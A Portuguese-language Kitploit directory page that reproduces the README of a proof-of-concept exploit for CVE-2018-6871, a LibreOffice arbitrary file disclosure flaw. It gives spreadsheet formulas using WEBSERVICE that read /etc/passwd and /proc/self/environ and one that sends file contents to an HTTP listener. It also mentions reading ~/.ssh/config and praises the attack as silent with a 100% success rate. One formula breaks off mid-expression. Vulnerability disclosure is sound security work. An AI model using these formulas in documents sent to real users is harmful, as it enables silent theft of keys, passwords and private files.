Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
libreoffice-remote-arbitrary-file-disclosure — Prova de conceito da vulnerabilidade de divulgação arbitrária de arquivos remotos do LibreOffice | Kitploit
Ferramentas/GitHubGitHub/jollheef/libreoffice-remote-arbitrary-file-disclosure
Análise de VulnerabilidadesExploraçãoExfiltração de DadosColeta de Informações
GitHubjollheef/libreoffice-remote-arbitrary-file-disclosure

libreoffice-remote-arbitrary-file-disclosure

Prova de conceito da vulnerabilidade de divulgação arbitrária de arquivos remotos do LibreOffice

Ver Repositório
9693há 8 anosRevisado pelo Kitploit

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

Descrição da vulnerabilidade

CVE-2018-6871

Primeira parte

O LibreOffice suporta a função COM.MICROSOFT.WEBSERVICE:

root@kitploit:~
https://support.office.com/en-us/article/webservice-function-0546a35a-ecc6-4739-aed7-c0b7ce1562c4

A função é utilizada para obter dados por URL, geralmente usada como:

root@kitploit:~
=FILTERXML(WEBSERVICE("http://api.openweathermap.org/data/2.5/forecast?q=Copenhagen,dk&mode=xml&units=metric");"number(/weatherdata/forecast/time[2]/temperature/@value)")

No original:

root@kitploit:~
Para protocolos não suportados, como ftp: // ou file: //, a função WEBSERVICE retorna o valor de erro #VALUE!.

No LibreOffice, essas restrições não são implementadas antes das versões 5.4.5/6.0.1.

Segunda parte

Por padrão, as células não são atualizadas, mas se você especificar o tipo de célula como ~error, a célula será atualizada ao abrir o documento.

Exploração

Para ler um arquivo, basta usar:

root@kitploit:~
=WEBSERVICE("/etc/passwd")

Essa função também pode ser usada para enviar um arquivo:

root@kitploit:~
=WEBSERVICE("http://localhost:6000/?q=" & WEBSERVICE("/etc/passwd"))

Para que a operação tenha sucesso, você precisa enviar os arquivos do usuário atual, então é necessário obter o caminho da home do usuário atual.

root@kitploit:~
=MID(WEBSERVICE("/proc/self/environ"), FIND("USER=", WEBSERVICE("/proc/self/environ")) + 5, SEARCH(CHAR(0), WEBSERVICE("/proc/self/environ"), FIND("USER=", WEBSERVICE("/proc/self/environ")))-FIND("USER=",

Você também pode interpretar outros arquivos, como um ~/.ssh/config ou algo do tipo.

Para formatos diferentes do LibreOffice Calc, basta incorporar um objeto do Calc em outro documento (eu verifiquei que funciona).

Impacto

É fácil enviar quaisquer arquivos com chaves, senhas e qualquer outra coisa. Taxa de sucesso de 100%, absolutamente silencioso, afeta o LibreOffice anterior às versões 5.4.5/6.0.1 em todos os sistemas operacionais (GNU/Linux, MS Windows, macOS etc.) e pode ser incorporado em quase todos os formatos suportados pelo LO.

Agradecimentos

A vulnerabilidade foi encontrada de forma independente por mim (@jollheef) e por Ronnie Goodrich && Andrew Krasichkov (de acordo com as notas da equipe do LibreOffice).

Baixar ferramenta